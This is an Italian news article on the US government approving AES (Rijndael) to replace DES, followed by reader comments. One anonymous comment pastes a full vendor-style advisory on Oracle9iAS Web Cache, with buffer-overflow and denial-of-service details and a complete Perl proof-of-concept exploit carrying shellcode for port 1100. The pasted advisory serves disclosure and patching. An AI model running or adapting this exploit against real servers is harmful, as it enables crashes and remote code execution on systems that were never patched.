Gli USA salutano DES e passano a 256 bit

Gli USA hanno appena approvato il nuovo standard crittografico che, negli enti governativi, manderà finalmente in pensione il vecchio e bucatissimo DES


Washington (USA) – Nell’ottobre del 2000, a conclusione di una rigorosa fase di testing, il National Institute of Standards and Technology (NIST) scelse AES (Advanced Encryption Standard) come nuovo algoritmo crittografico ufficiale per gli enti ed i servizi governativi degli USA.

Ad oltre un anno di distanza, ieri il Governo americano ha finalmente annunciato l’approvazione definitiva di quel nuovo standard per la crittazione dei dati che manda finalmente in pensione il vecchio DES (Data Encryption Standard), uno standard approvato dal NIST nel lontano 1977 e che oggi, a quasi 24 anni di distanza, appare nudo e vulnerabile come un bimbo.

“AES aiuterà la nazione a proteggere le sua cruciale infrastruttura informativa e ad assicurare la privacy per le informazioni personali relative ai cittadini americani”, ha dichiarato il Segretario per il Commercio Don Evans Un compito che diventa oggi ancor più cruciale nel clima che si è venuto a creare dopo gli eventi dell’11 settembre.

Il Governo USA si aspetta che AES venga ampiamente adottato anche nel settore privato per proteggere le informazioni sensibili e le transazioni finanziarie. Le applicazioni basate su AES potranno inoltre essere esportate anche in altri paesi.

Il nuovo standard AES è fondato su Rijndael, l’algoritmo crittografico che prende il nome dai suoi due autori – i belgi Vincent Rijmen e Joan Daemen – e che lo scorso anno venne selezionato come il vincitore fra una folta schiera di pretendenti al titolo. In quell’occasione il NIST giustificò la sua scelta dichiarando che Rijmen era “la migliore combinazione fra sicurezza, prestazioni, efficienza, implementabilità e flessibilità”. In particolare, gli esperti sostengono che le prestazioni dell’algoritmo scalano bene attraverso una grande varietà di piattaforme per il computing e le sue piccole dimensioni lo rendono ideale per le smart card e le applicazioni per il mobile.

A differenza di DES, che generava chiavi di 56 bit, Rijndael supporta chiavi di lunghezza pari a 128, 192 e 256 bit. Una chiave di 128 bit può creare un numero di combinazioni a 39 cifre, mentre una chiave a 256 bit consente un insieme massimo di combinazioni pari a 11 seguito da 76 zeri.

Come è più volte stato dimostrato, attraverso computer specializzati a basso costo una chiave DES potrebbe essere crackata nel giro di poche ore. Secondo il NIST, se si assumesse l’esistenza di una macchina in grado di rompere una chiave DES nel giro di un secondo, questa stessa macchina impiegherebbe 149.000 miliardi di anni per rompere una chiave a 128 bit. C’è da dire che i nuovi algoritmi crittografici difficilmente temono attacchi di forza bruta: la loro solidità si misura soprattutto in base alla loro resistenza alle tecniche più sofisticate di criptoanalisi, tese ad individuare le più piccole debolezze presenti nell’algoritmo.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    antiproiettile ma quando leggete e vedrete
    Oracle9iAS Web Cache Multiple DoS and Buffer OverflowVulnerable systems:Oracle9iAS Web Cache version 2.0.0.1.0A simple URL driven denial of service or buffer overflow condition occurs when a very long text string is sent to the web service. This occurs on all four web services that the Oracle9iAS Web Cache software provides. The four services are by default run on:Port 1100 = Incoming web cache proxy.Port 4000 = Administrative interface.Port 4001 = Web XML invalidation port.Port 4002 = Statistics port.Buffer overflow condition:When sending a request containing / + 'A' x 3095 + 'N' x 4, the process terminates with the with the following state dump: State Dump for Thread Id 0x104 eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041 esi=01baac86 edi=0040deb6 eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0 cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000216 Denial of service:Upon sending a string longer then 3570 characters, the process simply exists without stack dump: 'GET / HTTP/1.0'The following three denial of service attacks result in the process hanging and the CPU usage of 100%. A reboot is required in order to terminate the hanging processes: - When sending a string containing approximately 3094 characters. - When sending more approximately 4000 characters in the HTTP header. User-Agent is one of the verified headers where this condition exists. 'GET / HTTP/1.0' 'User-Agent: ' - Sending the following request (this only affects the webcache admin interface): 'GET /. HTTP/1.0'Workaround:Download patch from Oracle's support website,http://metalink.oracle.comWindows NT or Windows 2000:Patch number 2044682SUN Sparc Solaris:Patch number 2042106HP-UX:Patch number 2043908Linux:Patch number 2043924Compaq Tru64 Unix:Patch number 2043921IBM AIX:Patch number 2043917Exploit:###################################################################### Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0# Creates the file c:\defcom.iyd# By andreas@defcom.com (C)2001## # Since we do not control the space after what ESP points to, I was lazy # and did a direct buffer jump. So, if it does not work, try changing# the return address(start of buffer in mem) to one that fits your system.# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).# /andreas#####################################################################$ARGC=@ARGV;if ($ARGC !=1) { print "Usage: $0 \n"; print "Example: $0 127.0.0.1\n"; exit;}use Socket;my($remote,$port,$iaddr,$paddr,$proto);$remote=$ARGV[0];$port = "1100"; # default port for the web cache$iaddr = inet_aton($remote) or die "Error: $!";$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";$proto = getprotobyname('tcp') or die "Error: $!";socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";connect(SOCK, $paddr) or die "Error: $!";$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";print $msg;send(SOCK, $msg, 0) or die "Cannot send query: $!";sleep(1);close(SOCK);exit;e come vedete c'è anche l'esploite complimenti oracle raggiungi e superi la MSricordate non esiste la sicurezza non fatevi fregare
  • Anonimo scrive:
    antiproiettile perche
    devono solo spararmi per costringermi ad usarla e cosi comodo tomcaz ed e gratisso
  • Anonimo scrive:
    oraculo alla riscossa
    ma vorrei sapere chi con un po di inteliggenza nella zucca va ad impelagarsi con una cosa rognosa come un oraculo boooooo, forse chi si può permettere i suoi costosi consulenti che non consolano proprio niente (le fatture le sanno fare pero altro che bill, in confronto a loro e una verginella)
  • Anonimo scrive:
    Ma funziona ?
    Non so voi ma sarà la quarta volta che cerco di installare l'AS di Oracle ...Una volta per bontà suaUna volta perchè va in conflitto con la mia attuale versione clientUna volta perchè ho cambiato le directory predefinite Una volta per ....Voi tutto ok ?
  • Anonimo scrive:
    Rogne
    "indistruttibile e inviolabile"Fare di queste affermazioni vuol dire cercarsele, le rogne.
Chiudi i commenti